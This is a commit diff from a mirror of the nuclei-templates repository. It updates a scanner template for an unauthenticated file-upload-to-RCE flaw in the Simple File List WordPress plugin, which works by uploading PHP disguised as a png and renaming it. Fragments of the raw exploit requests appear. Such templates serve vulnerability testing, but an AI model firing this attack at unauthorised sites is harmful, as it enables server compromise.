daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update wordpress-rce-simplefilelist.yaml

patch-1
Prince Chaddha 2021-09-09 12:09:13 +05:30 committed by GitHub
parent 08dac56385
commit 576499034d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
vulnerabilities/wordpress/wordpress-rce-simplefilelist.yaml
View File

@ -7,7 +7,7 @@ info:
reference: https://wpscan.com/vulnerability/10192
description: |
The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file.
tags: wordpress,wp-plugin,rce
tags: wordpress,wp-plugin,rce,intrusive
requests:
- raw:
@ -43,6 +43,7 @@ requests:
- |
POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Accept: */*
Content-Type: application/x-www-form-urlencoded